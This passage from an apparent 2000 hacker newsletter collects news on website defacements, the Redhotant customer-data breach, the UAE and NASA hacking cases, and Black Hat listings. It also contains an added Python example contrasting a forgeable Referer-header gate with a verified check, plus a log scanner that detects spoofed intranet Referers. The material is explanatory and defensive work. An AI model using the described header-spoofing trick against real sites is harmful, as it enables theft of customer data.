      nationwide survey of 300 adults who download music off the Internet 
      conducted by Connecticut-based market research firm InsightExpress, 
      indicates that nearly half of Napster users surveyed feel the service does 
      not violate federal copyright statutes. And more than half feel they are 
      not themselves guilty of violating copyright law when using Napster.

      Again, Robinson is unmoved. "It's not for the great unwashed to decide 
      what's in my best interests," he said. "Ten million people should not have 
      the technological weapon to rip off thousands of other people who do not 
      have the technology to combat them. That's not what America stands for."

      Likewise, frequent arguments that Napster and its many clones actually 
      drive sales because they expose people to music they never heard before - 
      an argument given weight by a recent study of 17,000 users by Yankelovich 
      Partners Inc. - also are meaningless to Robinson.

      "I feel like it's not for a group of people to look at some survey and 
      say, 'Hey, it's going to be good in the long run,'" the musician said. 
      "It's not their right to make that decision. It belongs to the copyright 
      holder. It's their decision and no one else's."

      And he is unswayed by prevailing arguments from people like Public Enemy 
      rapper Chuck D., holding that Napster represents a technological tide 
      that cannot be turned.

      "That's the thing about the technology. But just because the cops can tap 
      your phone doesn't mean they should," Robinson said. "One of the things 
      that's implicit in the site is we're asking for legislation. We're trying 
      to raise the constitutional issue. We're saying you can't just get rid of 
      (copyright protections) because it's inconvenient. We as a nation have got 
      to come to some sort of consensus on this."

      The Stop Napster site is online at http://www.stopnapster.com . 
      
      @HWA
      
278.0 [IND] Pro-gun Hackers Take Over Web Site
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 26 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_062600a_j.shtml
      
      6/26/00
      Pro-gun Hackers Take Over Web Site
      
      For a while at least, the 10 or so employees of the Violence Policy Center 
      tried to remain blasé after their Web site was hijacked Monday by anti-gun 
      control hackers, their usual home page replaced by a clunky gray box with 
      a bomb and a skull and crossbones.

      Josh Sugarmann, VPC's executive director, figured the site could be 
      restored in a matter of hours, and refrained from trying to fix the site 
      in order to "leave the crime scene untouched" for the FBI. Tuesday, 
      however, he learned that the cyberterrorists didn't just hack on to their 
      site, linking to pro-gun groups, erasing mountains of data (which VPC 
      luckily had saved) and gloating onscreen about getting rid of VPC's 
      "propagandist bullshit." They also stole the group's Web identity.

      Apparently, the hackers figured out a way to actually take over access to 
      the site, which is licensed to VPC by Network Solutions. So until 
      Sugarmann finds out how to wrest control away from them, the hackers are 
      masters of the group's domain. That includes incoming e-mail to VPC from 
      its Web address, which makes Sugarmann concerned for the safety of the 
      senders.

      Then, in more bad news, the FBI told Sugarmann that the hacking doesn't 
      become a blip on the FBI's radar screen until the group can prove it has 
      incurred $5,000 in damages -- a serious hurdle for a nonprofit 
      organization, because its losses are largely confined to the labor 
      required to fix the hacking mess. Its product is information, which it 
      gives away for free, so assessing damages becomes a guessing game. "These 
      are standards that are put in place for for-profit entities," he said.

      VPC is a fairly frequent target of gun advocates -- and vice versa. The 
      group is a rising star among gun control groups, most recently scrapping 
      with the NRA over its feathered and kid-friendly mascot, Eddie Eagle, and 
      its plans for a Times Square theme restaurant. In turn, the NRA has taken 
      personal swipes at Sugarmann, and the pro-gun press repeatedly lambastes 
      him and his group.

      In a way, the attack may have been inevitable. Sugarmann says gun 
      advocates have always been pioneers in communication technology. "They 
      were the first to use computer bulletin boards, they were the first to use 
      the Web, they were the first to use blast fax," he said. "They are way 
      ahead of organizations on our side of the issue."

      Gun advocates have cloned gun control sites in the past. 
      Handguncontrol.net, a pro-gun site, mirrors the anti-gun 
      Handguncontrol.org, just as Center for the Prevention of Handgun Violence 
      has its own doppelganger. VPC seemed immune to these attacks, since the 
      likely addresses -- vpc.net and vpc.com -- are owned by groups unrelated 
      to the gun issue.

      Gun rights activists may not settle for cloning anymore. According to 
      Sugarmann, those groups could now start aggressive hack attacks against 
      other anti-gun organizations, having been emboldened by their temporary 
      triumph over VPC. "In pro-gun cyberspace," he says, "this is a big 
      victory."

      By Alicia Montgomery
      June 21, 2000
      
      http://www.salon.com/politics/feature/2000/06/21/guns/index.html 
      
      Pro-gun hackers take over Web site
      And a prominent group of gun critics is still trying to get it back.
     
      About the writer
      Alicia Montgomery is an assistant editor in Salon's Washington bureau. 
      
      @HWA
      
279.0 [IND] Hacker Taps Into 24,000 Credit Cards
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      6/26/00
      Hacker Taps Into 24,000 Credit Cards
      Maurice Chittenden June 25 2000 BRITAIN
      
      A COMPUTER hacker has breached the security of a pioneering internet 
      service provider to obtain the names, addresses, passwords and credit card 
      details of more than 24,000 people.

      The victims include scientists at the top-secret Defence Evaluation and 
      Research Agency, senior officials in the government, BBC bosses and 
      executives at companies such as Shell, Barclaycard and Halifax.

      The hacker, an information technology consultant, says that he targeted 
      Redhotant to expose security lapses.

      The Kent-based company is at the forefront of a new style of internet 
      provision: subscribers pay as little as £30 a year for unlimited access to 
      the web with no additional phone charges. It aims to attract half a 
      million users in Britain, but its critics say it is failing to cope with 
      demand.

      Trading standards officers are investigating complaints that people have 
      had difficulty getting online, although the company claims to have a line 
      for every nine customers.

      The company, which has taken up to £1.5m in subscriptions, says it plans 
      to double capacity. Last week it was offline for several days and blamed a 
      technical hitch after a thunderstorm.

      The consultant who obtained the details of Redhotant's subscribers broke 
      the data protection law but says he did it only out of public interest to 
      highlight lack of security.

      He used a proxy, a device normally used for disguising the identity of a 
      user, as an intermediary to search the site for files.

      Among them he found the customer database. Only those connected to the 
      company's internal network are supposed to access it. The hacker got 
      around this by typing in: "referrer: the intranet site".

      He said: "It was child's play. I didn't actually need to hack in the 
      normal sense because I didn't need any passwords. It was like rooting 
      around in bins for a key and then finding there was a wide-open side 
      entrance.

      "Redhotant's biggest mistake was keeping its own records on the same disk 
      and machine as all its services."

      He added: "I sent them a couple of e-mails alerting them to the problem 
      but they ignored it. The lesson is simple. Don't put anything on a website 
      that you wouldn't put on a billboard."

      Redhotant is part of the Jak internet group, which operates from offices 
      near the Channel Tunnel in Kent.

      Kevin Packwood, a director, said he was unaware of the security breach. He 
      said: "I would be very surprised if somebody could get that far. Our 
      security measures should have been able to see it happening and alarms 
      would have sounded."

      http://www.the-times.co.uk/news/pages/sti/2000/06/25/stinwenws01002.html 
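
      The Referer-based restriction described in the article above, shown
      beside a check the server can actually verify and a log review that
      would have raised the alarm. This is an added example, not part of the
      original report and not Redhotant's code; every host name, address,
      path, account and key in it is a constructed assumption.

```python
import hashlib
import hmac
import ipaddress
import re

# Every host, address, path, account and key here is constructed for illustration.
INTRANET_PREFIX = "http://intranet.example.internal/"
INTERNAL_NET = ipaddress.ip_network("10.20.0.0/16")
SESSION_KEY = b"constructed-demo-key"
STAFF = {"alice"}


def referer_gate(headers):
    """Weak check: grants access on a header the client writes itself."""
    return headers.get("Referer", "").startswith(INTRANET_PREFIX)


def sign_session(user):
    """Token issued after a real login (the login step is out of scope here)."""
    mac = hmac.new(SESSION_KEY, user.encode(), hashlib.sha256).hexdigest()
    return f"{user}.{mac}"


def verify_session(token):
    """Return the user name if the token's MAC is valid, else None."""
    user, sep, mac = token.rpartition(".")
    if not sep or not user:
        return None
    expected = hmac.new(SESSION_KEY, user.encode(), hashlib.sha256).hexdigest()
    if hmac.compare_digest(mac.encode(), expected.encode()):
        return user
    return None


def is_internal(addr):
    """True only for a well-formed address inside the internal network."""
    try:
        return ipaddress.ip_address(addr) in INTERNAL_NET
    except ValueError:
        return False


def hardened_gate(peer_addr, session_token):
    """Decide from values the server can verify; the Referer is never read.

    peer_addr must be the TCP peer address seen by the server socket,
    not a value copied from a request header.
    """
    if not is_internal(peer_addr):
        return False
    return verify_session(session_token) in STAFF


# Combined log format: addr, request line, status, size, referer, user agent.
LOG_RE = re.compile(
    r'(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "[^"]*"'
)

# Constructed sample access log lines.
SAMPLE_LOG = [
    '10.20.3.4 - alice [25/Jun/2000:09:58:40 +0100] '
    '"GET /records/customers.db HTTP/1.0" 200 51200 '
    '"http://intranet.example.internal/index.html" "Mozilla/4.0"',
    '203.0.113.7 - - [25/Jun/2000:10:02:11 +0100] '
    '"GET /records/customers.db HTTP/1.0" 200 51200 '
    '"http://intranet.example.internal/" "Mozilla/4.0"',
    '198.51.100.9 - - [25/Jun/2000:10:03:05 +0100] '
    '"GET /index.html HTTP/1.0" 200 1024 "-" "Mozilla/4.0"',
]


def flag_spoofed_referer(lines):
    """Report requests that claim an intranet Referer from an outside address."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        addr, path, status, referer = m.groups()
        if referer.startswith(INTRANET_PREFIX) and not is_internal(addr):
            hits.append((addr, path, status))
    return hits


if __name__ == "__main__":
    for hit in flag_spoofed_referer(SAMPLE_LOG):
        print("external request with intranet Referer:", hit)
```

      A 200 status on a flagged line means the weak gate served the file;
      the hardened gate refuses the same request because neither the peer
      address nor a valid session backs it up.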
      
      
      @HWA
      
280.0 [IND] Etisalat Vows to Prosecute Internet Hackers
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 28 2000
      www.infowar.com
      
      http://www.infowar.com/hacker/00/hack_062800a_j.shtml
      
      6/28/00
      Etisalat Vows to Prosecute Internet Hackers
      
      DUBAI (Reuters) - United Arab Emirates telecoms firm Etisalat has vowed to 
      prosecute hackers into the country's Internet system and described as 
      ``baseless'' lawsuits by a Briton alleged to have disrupted online 
      services earlier this month.

      ``It is appalling to think that any of these 'hackers' can infiltrate a 
      computer security system and cause absolute chaos with direct economic 
      consequences,'' Etisalat's lawyer, Hamad Kadfoor al-Mehairi, said in a 
      statement received by Reuters on Wednesday.

      ``We have a duty at Etisalat and the government of the UAE to safeguard 
      the confidentiality of our customers to ensure complete trust in the 
      system. We will not hesitate in prosecuting anyone who abuses the 
      system,'' he added.

      Lee Alan Ashurst, 21, of Manchester, suspected by Etisalat officials of 
      hacking and blamed for disruption experienced by some local Internet 
      subscribers earlier this month, has denied the accusations and said he had 
      filed lawsuits for defamation and damages against Etisalat.

      ``I have no idea what they (Etisalat) are talking about, I am being used 
      as a scapegoat,'' Ashurst told a news conference on Monday.

      ``I have lost my job, my company car and apartment as a result of these 
      accusations and I am suing Etisalat for defamation and damages,'' he 
      added.

      Mehairi said Etisalat viewed the lawsuit as ``baseless and simply a 
      diversionary tactic.''

      Mehairi said hacking into the Internet system endangered electronic 
      commerce in the UAE and was punishable under the law by up to ten years in 
      jail.

      Dubai is trying to build on its reputation as a regional trading hub to 
      attract international information technology firms to set up bases at a 
      $272 million free trade zone for electronic commerce scheduled to open 
      later this year.

      Local media on Monday quoted Dubai's Attorney General Ibrahim abu Melha as 
      saying a committee of computer experts was looking into the case and would 
      examine statements from both Etisalat and Ashurst.

      ``Once the technical report is made public, the seriousness of the crime 
      would be obvious. Although many of the younger generation view the 
      Internet as a challenging game or pastime, we have to protect the 
      commercial interest of the United Arab Emirates,'' Mehairi said. 
      
      @HWA
      
281.0 [IND] Foundstone's Ultimate Hacking Course Available at Black Hat Briefings
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 28 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_062800b_j.shtml      
      
      6/28/00 
      
      Company Press Release
      Foundstone's Ultimate Hacking Course Available at Black Hat Briefings
      'White Hat' Consultants Offer Popular Computer Security Training July 24-25
      IRVINE, Calif.--(BUSINESS WIRE)--June 28, 2000--Foundstone Inc., the 
      leading ``white hat'' computer security training and consulting company, 
      and Black Hat Briefings today announced that Foundstone's Ultimate 
      Hacking: Black Hat Edition course will be offered July 24-25 in 
      conjunction with the Black Hat Briefings 2000 conference in Las Vegas that 
      week.

      The latest addition to Foundstone's renowned security training program, 
      Ultimate Hacking: Black Hat Edition is an intensive, hands-on course 
      designed for system administrators, network engineers, and others who work 
      at the ``front lines'' protecting their organizations from hacker attacks.

      Scheduled for the two days preceding the Black Hat Briefings, the course 
      is a complement to the annual gathering of corporate and ``underground'' 
      security specialists. ``The top security professionals from around the 
      world come to the Black Hat Briefings to mingle with the enemy,'' said 
      George Kurtz, Foundstone CEO. ``They come because they know in order to 
      protect a network, they must understand how a hacker works. And that's 
      what Ultimate Hacking will show them.''

      In Ultimate Hacking: Black Hat Edition, course participants will learn 
      from Foundstone's all-star team of experienced security professionals, 
      including the co-authors of Hacking Exposed: Network Security Secrets and 
      Solutions. Written by the company's founders, this best-selling guide 
      exposes hacker techniques and methods to defend against them.

      ``I strive to put together the best security conferences and pre-show 
      training that I can,'' said Jeff Moss, Founder and President of Black Hat, 
      Inc. ``To meet that expectation, we have partnered with Foundstone. Not 
      only can they walk the walk, but collectively they have years of 
      experience in breaking into Corporate America and defending against hacker 
      threats.''

      Ultimate Hacking: Black Hat Edition training will take place in a fully 
      configured classroom lab to dramatically illustrate the critical 
      vulnerabilities in Windows and Unix systems and the latest countermeasures 
      for them. ``The best way for participants to gain this knowledge and 
      sharpen their skills is to 'learn-by-doing' in a hands-on environment,'' 
      said Kurtz.

      Topics covered will include ``Assessing and Penetrating NT and Unix 
      Networks and Hosts'', ``Securing NT and Unix Hosts'', and ``Identifying 
      Common E-Commerce Web Vulnerabilities''.

      To sign up for Ultimate Hacking: Black Hat Edition, interested persons 
      should visit the Black Hat web site at www.blackhat.com.

      About Foundstone

      Foundstone Inc., headquartered in Irvine, California, is the premier 
      computer security training and consulting company. Foundstone's team of 
      experts have thwarted hackers for years at the highest corporate and 
      government levels, including three of the Big Five accounting firms, the 
      United States Air Force, and defense contractors for classified Department 
      of Defense projects such as the B-2 Stealth Bomber.

      Foundstone's multi-pronged approach to preventing computer crime involves 
      building security expertise within corporations through training, attack 
      and penetration testing, and incident-response assessment. Using these 
      methods, Foundstone has secured the computer operations of leading 
      dot-coms and Global 2000 companies across a wide range of industries. 
      Contact Foundstone at 877/91-FOUND or visit www.foundstone.com.

      About Black Hat Briefings 2000

      The Black Hat Briefings conference series brings together corporate 
      security professionals and the ``underground'' security experts who 
      develop the tools used by and against hackers. By tradition, the Black Hat 
      Briefings are held in Las Vegas during the days immediately preceding DEF 
      CON, the largest hacker convention in the U.S. This year, the Black Hat 
      Briefings are July 26-27, with DEF CON 8.0 following on July 28-30.

      The Black Hat Briefings conference is an ``in the trenches'', 
      vendor-neutral gathering where administrators, engineers, and programmers 
      learn about the latest developments in hacking and computer security, 
      giving them a no-nonsense way to protect their networks and systems in the 
      real world. For more information visit www.blackhat.com.

      Foundstone, Inc. -- Securing the Dot Com World 
      
      
      --------------------------------------------------------------------------------
      Contact: 
      
      
           Foundstone, Inc.
           Nico Sell, 650/456-0943
           nico@foundstone.com
      @HWA
      

282.0 [IND] Student Admits Hacking U.S. Government Computers
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      http://www.infowar.com/hacker/00/hack_063000a_j.shtml      
      
      
      6/30/00 Student Admits Hacking U.S. Government Computers

      BOSTON (Reuters) - A university student admitted in Boston federal court 
      to breaking into U.S. government computers including Defense Department 
      and NASA systems.

      Ikenna Iffih, a student at Northeastern University's College of Computer 
      Science, pleaded guilty to a series of coast-to-coast cyber attacks before 
      U.S. District Judge Robert Keeton late on Thursday.

      Under a plea deal, Iffih faces up to 20 years in prison with a possible 
      mandatory minimum sentence of six months, a fine of up to $750,000 and 
      three years of supervised release when sentenced on Oct. 25.

      The 29-year-old student also admitted hacking into Zebra Marketing Online 
      Services (ZMOS), a Washington-state based company that provides Web 
      service to other firms. Court papers showed the Bainbridge Island company 
      near Seattle lost more than $30,000 and took about 42 hours to return to 
      minimal operations during the April 1999 attack.

      FBI agents, after obtaining about 20 court orders, were able to trace the 
      break-ins to the NASA (National Aeronautics and Space Administration) 
      computer, the Defense Department's Logistics Agency computer, and ZMOS 
      system to the personal computer in Iffih's Boston home.

      ``All in all, the defendant used his home computer to leave a trail of 
      cybercrime from coast to coast,'' U.S. Attorney for Massachusetts Donald 
      Stern said in a statement. 
      
      @HWA

283.0 [IND] Hacker may have endangered astronauts 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.infowar.com/hacker/00/hack_070300a_j.shtml      
      
      7/03/00
      Hacker May Have Endangered Astronauts 
      By The Associated Press
      Special to CNET News.com
      July 2, 2000, 6:00 p.m. PT     
      
      http://news.cnet.com/news/0-1005-200-2194575.html 
      
      LONDON--A computer hacker endangered shuttle astronauts in 1997 by 
      overloading NASA's communication system, according to a report.

      As the shuttle docked at the Russian space station Mir, a hacker tapped 
      into the National Aeronautics and Space Administration computer system 
      that monitors the heartbeat, pulse and medical condition of astronauts 
      aboard the spacecraft, the British Broadcasting Corp. reported today. 

      "We had an activity at NASA center where a hacker was overloading our 
      system...to such an extent that it interfered with communications between 
      the NASA center, some medical communications and the astronaut aboard the 
      shuttle," Roberta Gross, inspector general at NASA, said in a BBC 
      documentary to be aired tomorrow. 

      NASA was forced to switch systems and talk to the astronauts via the space 
      station. 

      The report was released ahead of the premiere of "Cyber Attack," which 
      looks at how hackers are able to penetrate the defense systems of such 
      countries as the United States and Britain. 

      Gross said NASA has numerous fail-safe measures to ensure communications, 
      "but it shows the potential hackers have for doing some real damage to 
      NASA's mission and astronaut safety." 

      In the past year, NASA has experienced more than 500,000 cyberattacks, the 
      report said. 

      "Everybody knows if there's a problem at Houston, a potential 
      vulnerability or someone is able to supersede the system we set up, that's 
      dangerous," Gross said. 

      Astronaut Michael Foale, who was part of the 1997 mission, told the BBC he 
      was not informed of the problems at the time but found the revelations 
      intriguing. 

      Copyright © 2000 Associated Press. All rights reserved. This material may not
      be published, broadcast, rewritten, or redistributed. 
      
      @HWA

284.0 [IND] Accused UAE Hacker Files Defamation Lawsuit
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.infowar.com/hacker/00/hack_070300b_j.shtml      
      
      7/03/00
      Accused UAE Hacker Files Defamation Lawsuit
      By Steve Gold, Newsbytes
      DUBAI, UNITED ARAB EMIRATES,
      03 Jul 2000, 1:20 PM CST
      
      A British man who was arrested in mid-June, suspected of hacking into the 
      United Arab Emirates' (UAE's) Internet system, has sued the 
      telecommunications company instrumental in his arrest.

      The unnamed 21-year-old, originally from the UK, was arrested in mid June 
      and was expected to be charged with damaging the country's economy, a 
      serious offense that carries up to a 10-year prison sentence.

      The 21-year-old man, who works as a senior computer engineer in Dubai, was 
      traced by Etisalat's network security staff. He was released after 24 
      hours in jail and has not yet been charged.

      The case is thought to be the first computer hacking in the Middle East. 
      Like many countries in the region, the UAE has no computer security 
      legislation in place.

      In press reports after the arrest, Etisalat officials blamed the suspected 
      hacker for much of the disruption that has been experienced by local 
      Internet subscribers in the past two weeks.

      Some local media reports appear to have revealed sufficient information 
      for the man to be identified by people in the UAE computer industry.

      As a result of this, his lawyer, Habib al-Mulla told reporters over the 
      weekend that his client was filing for defamation. The lawyer has also 
      applied for copies of Etisalat's records from when the alleged sabotage on 
      its computer systems took place.

      Reports suggest that Etisalat will appear in court on July 9 to offer its 
      defense in the defamation case.

      If charges are made, al-Mulla's client could face up to 10 years in 
      prison, although media reports suggest that he will only face up to six 
      months, as well as fines approaching $2,750.

      Etisalat's Web site is at http://www.etisalat.co.ae . 
      
      @HWA

285.0 [IND] NASA Denies Hacker Attack Danger
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.infowar.com/hacker/00/hack_070500a_j.shtml
      
      7/05/00 
      
      NASA Denies Hacker Attack Danger
      By DAVID HO, Associated Press Writer
      
      WASHINGTON (AP) - NASA officials denied reports Monday that a computer 
      hacker attack in 1997 endangered astronauts by disrupting communications 
      with the space shuttle Atlantis.

      The British Broadcasting Corp. had reported that during a rendezvous with 
      the Russian space station Mir, a hacker interfered with communications and 
      forced the shuttle crew to use the Russian station to maintain contact 
      with NASA.

      http://dailynews.yahoo.com/h/ap/20000703/tc/nasa_hacker_1.html 

      Monday July 3 7:38 PM ET

      ``At no point did ground controllers lose contact with the astronauts. 
      That never happened,'' said National Aeronautics and Space Administration 
      spokesman Bob Jacobs.

      He also said the astronauts never used the Russian space station as a 
      communications relay.

      The BBC could not immediately be reached for comment.

      Jacobs did confirm a hacker had delayed the transmission of astronaut 
      medical data between NASA computer systems on the ground, but backup 
      systems corrected the problem. The medical information had already been 
      sent down from the shuttle and was being distributed to different 
      locations.

      ``People try to hack into the system constantly, but any mission critical 
      computer system is insulated from the communications network,'' he said, 
      noting that hackers had made about 500,000 attacks against the space 
      agency in the last year.

      Jacobs said NASA's headquarters didn't know who had conducted the attack, 
      but the agency's inspector general is investigating the incident.

      The BBC report was released in advance of a documentary aired Monday 
      called ``Cyber Attack,'' which looked at how hackers penetrate the 
      computer defenses of countries like the United States and Britain.

      The BBC reported that Roberta Gross, NASA inspector general, said, ``We 
      had an activity at NASA center where a hacker was overloading our system 
      ... to such an extent that it interfered with communications between the 
      NASA center, some medical communications and the astronaut aboard the 
      shuttle.''

      Jacobs said Gross had been referring to the disruption on the ground and 
      not any problem communicating with the astronauts.

      During the September 1997 mission, the space shuttle Atlantis retrieved 
      astronaut Michael Foale, who had spent 134 days aboard Mir.

      Last Thursday, a former computer science student of Northeastern 
      University pleaded guilty to going on a hacking spree against private and 
      government targets, including the military and NASA. Ikenna Iffih, 20, 
      broke into computers at NASA's Goddard Space Flight Center in Greenbelt, 
      Md. and installed a program to capture users' names and passwords.

      -

      On the Net:

      The National Aeronautics and Space Administration: http://www.nasa.gov

      BBC program Panorama: http://news.bbc.co.uk/hi/english/events/panorama/ 
      
      @HWA

286.0 [IND] 'Houston, We Don't Have A Problem.' 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.infowar.com/hacker/00/hack_070500b_j.shtml
      
      7/05/00
      'Houston, We Don't Have A Problem. '
      By David McGuire, Newsbytes
      WASHINGTON, D.C., U.S.A.,
      03 Jul 2000, 5:05 PM CST
      
      NASA today refuted media reports that earth-based hacker activities 
      endangered the lives of astronauts on Space Shuttle Atlantis during a 1997 
      mission.

      Responding to a BBC report indicating that a hacker attack on NASA 
      communications systems had somehow interfered with Mission Control's 
      ability to monitor the astronauts' vital statistics, NASA today said that 
      the Atlantis crew was never in any danger.

      "Two ground-based computers were delayed in talking to each other (as a 
      result of the 1997 hack) and in fact, the transmission went through," NASA 
      spokesperson Ed Campion said today. The hack had no effect on "information 
      that was flowing up to, or down from, the space shuttle," Campion said.

      In a report earlier today, Reuters quoted NASA Inspector General Robin 
      Gross as telling the BBC that the hacker attack so disabled NASA computers 
      as to jeopardize shuttle-to-ground communications.

      But while Campion today confirmed that NASA suffered a hacker attack 
      during the September 1997 Atlantis mission, he contended that 
      shuttle-to-ground communications systems are walled off from the Internet 
      and are "very well protected."

      "You have to be in the (Mission Control) building to have access to those 
      systems," Campion said.

      The information transfer that was delayed by the attack was a "routine" 
      medical communication between Houston-based Mission Control and another 
      NASA location, Campion said.

      The 1997 attack remains under investigation by NASA's Inspector General, 
      Campion said. 
      
      @HWA

287.0 [IND] Crackers are Common Criminals
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      http://www.infowar.com/hacker/00/hack_070500c_j.shtml
      
      7/05/00
      Crackers are Common Criminals
      By: Andrew Thomas
      Posted: 04/07/2000 at 17:47 GMT 

      Hackers have a certain romantic image - it's a bit like Robin Hood; the 
      small man against the machine; the righter of wrongs, that sort of thing. 

      On British TV the other night, a young hacker from Wales was asked why he 
      had broken into a computer and downloaded several thousand people's bank 
      details. He replied that he had done it to prove that the bank's security 
      procedures were inadequate. It should have been obvious that he had no 
      criminal intent and naturally hadn't done anything with the downloaded 
      details. If he hadn't done it, someone else would have. 

      You are a judge. Before you in the court stands a pimply-faced youth with 
      greasy hair and an ill-advised vestigial beard. He stands accused of 
      breaking into several dozen houses and stealing credit card details and 
      address books. The address books were used to identify future properties 
      to burgle and, whilst in each house, he burnt all the personal 
      correspondence he could find. 

      His defence? 

      "I only did it to prove that the locks on these people's doors were 
      inadequate. If I hadn't done it, someone else would. It's the lock makers' 
      fault." 

      Do you, the judge, dismiss the charges and commend the young chap for his 
      public-spiritedness, whilst roundly condemning locksmiths for their sloppy 
      workmanship? Or do you sentence him to a public flogging and then send him 
      to choky? 

      Spinal Tap

      Another housebreaker stands accused of a number of 
      break-ins where he stole expensive stereo systems and CD collections. In 
      mitigation, he blames Metallica, Napalm Death and Spinal Tap for making 
      him do it. The reasoning is obvious - if these bands hadn't recorded 
      unencrypted music onto CDs in the first place, he wouldn't have been 
      tempted to pop into other people's houses while they were out and remove 
      them. And he needed the stereo systems to play them on. And the beer from 
      the fridge. And the car to carry it all away in. 

      In what way is hacking into a computer any different from breaking into a 
      house? Both are private property. Locks on doors are only necessary 
      because there are people who can't be bothered to work. They would much 
      rather you worked hard to buy things that they could later remove while 
      you were out earning more money. 

      Faulty locks are not the issue here - criminals are. 

      So why is it always Microsoft that gets blamed for making it too easy for 
      the criminals? Why aren't Compaq, Dell, IBM, Intel and AMD to blame for 
      providing the systems the hackers break into? For that matter, why aren't 
      the telcos and ISPs guilty, too? Do we read stories about Sony being 
      accused that its TVs and videos are encouraging break-ins because you 
      can't bolt them to the floor? 

      Of course Microsoft is a very successful company headed up by very rich 
      people, so envy is probably a key factor here. But surely Microsoft is 
      only exposed to hack attacks to the degree it is because millions of 
      people actually like its products and want to use them. They don't want 
      functionality removed, they want criminals to leave them alone. 

      A hack attack on a Word or Outlook user is surely criminal trespass on 
      their (electronic) property in exactly the same way it is if a burglar 
      breaks into their house. It doesn't matter how easy or hard it is - it's 
      still wrong. 

      Stop blaming Microsoft - it's the hackers who are the guilty ones. 

      http://www.theregister.co.uk/content/1/11763.html 
      
      @HWA

288.0 [IND] Black Hat Briefings -Singapore, May 2000
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      7/05/00
      Black Hat Briefings -Singapore, May 2000
      
      This stuff is GOOD.
      Speaker presentations in Power Point, Audio and Video are available at:
      
      http://www.blackhat.com/html/bh-asia-00/bh-asia-00-speakers.html 
      
      
      SPEAKERS 
      There were approximately 14 speakers over two days, including 
      a moderated panel discussion. 
      
      5/02/00 Presentation materials now on-line. A/V is encoding this week. 
      
      The goal of the talks is to give the audience quality information on the
      current state of system vulnerabilities and fixes, as well as future areas
      of concern.  We cover a broad range of security issues from the perspective
      of the network administrator, system cracker, and IS managers.  Because of
      our unique speakers, the Black Hat Briefings will offer the audience a deep
      insight into the real security issues facing your network with no vendor pitches!
       
      
      
      --------------------------------------------------------------------------------
      
      Greg Hoglund - Rootkit.com 
      Advanced Buffer Overflow Techniques 
      
      This is a technical talk aimed at people who have already been exposed to 
      buffer overflows and want to learn more.  The talk assumes the audience 
      has at least some knowledge of CPUs and processes.  For those of you who 
      already understand buffer overflows, this talk will be a refreshing 
      discourse on technique.  We will show how the injection method can be 
      decoupled from the payload.  We then explore the details and challenges of  
      injecting code into a remote process.  We will also explore the payload, 
      the encoding methods, and how to dynamically load new functions.  Lastly, 
      we discuss the possible effects of a payload, including network worms, 
      viruses, and rootkits.  

      Greg Hoglund is a software engineer and researcher.  His most notable 
      achievement was the creation of the Asmodeus Security Scanner, a Windows 
      NT based port scanner and ethernet sniffer, which he later sold to 
      Webtrends, Corp.  Additionally, Hoglund has written several white papers 
      on content based attacks, kernel patching, and forensics.  He currently 
      works as a researcher for Tripwire Security Systems, exploring forensics 
      issues. 
      
      Their Presentation!(PowerPoint 247k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Batz -  Independent Security Researcher. 
      Casing the Joint.  What we already know about your network.  
      
      An overview of what an attacker already knows about your network.  The 
      information is described using an ASN.1 template for possible integration 
      into autonomous agents, conspicuously similar to the ones described in 
      Caezar's presentation.  

      Batz is an independent security researcher and Evil Super Villain who 
      caused a stir last year by bringing to light some serious concerns with 
      BGP4 configuration and implementation at Blackhat Briefings 99 in Las 
      Vegas, Nevada.  

      Their Presentation!(PowerPoint 86k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Mudge - VP of R&D for @Stake. 
      An analysis of tactics used in discovering "passive" monitoring devices. 
      
      Formerly CEO and Chief Scientist at the renowned "hacker think tank", the 
      L0pht, Mudge is considered one of the nation's leading "grey-hat hackers". 
      He, along with the other members of the L0pht, is now heading up @Stake's 
      research labs, ensuring that the company is at the cutting edge of Internet 
      security. 

      Mudge is a widely sought after keynote speaker in various forums, 
      including analysis of electronic threats to national security. He has been 
      called to testify before the Senate Committee on Governmental Affairs, has 
      briefed a wide range of members of Congress and has conducted training 
      courses for the Department of Justice, NASA, the US Air Force, and other 
      governmental agencies. 

      A recognized name in cryptanalysis, Mudge has co-authored papers with 
      Bruce Schneier that were published in the 5th ACM Conference on Computer 
      and Communications Security, and the Secure Networking - CQRE 
      International Exhibition and Congress. 

      He is the original author of L0phtCrack, the award-winning NT password 
      auditing tool. In addition, Mudge co-authored Anti-Sniff, the world's 
      first commercial remote promiscuous mode detection program. He has written 
      over a dozen advisories and various tools -- many of which resulted in 
      numerous CERT advisories, vendor updates, and patches.

      
      --------------------------------------------------------------------------------
       
      Caezar -  
      Malicious Information Gathering 
      
      As in physical surveillance, information can be gathered about a target network 
      without penetrating its security perimeter.  Using computer virus and worm techniques
      to surround the target, an opponent can monitor and collect web and e-mail traffic.  
      Critical business communications could be altered in transit or halted altogether.  
      This discussion will cover independent autonomous agents, information filtering and 
      malicious code propagation. 
      
      Their Presentation!(PowerPoint 92k) 
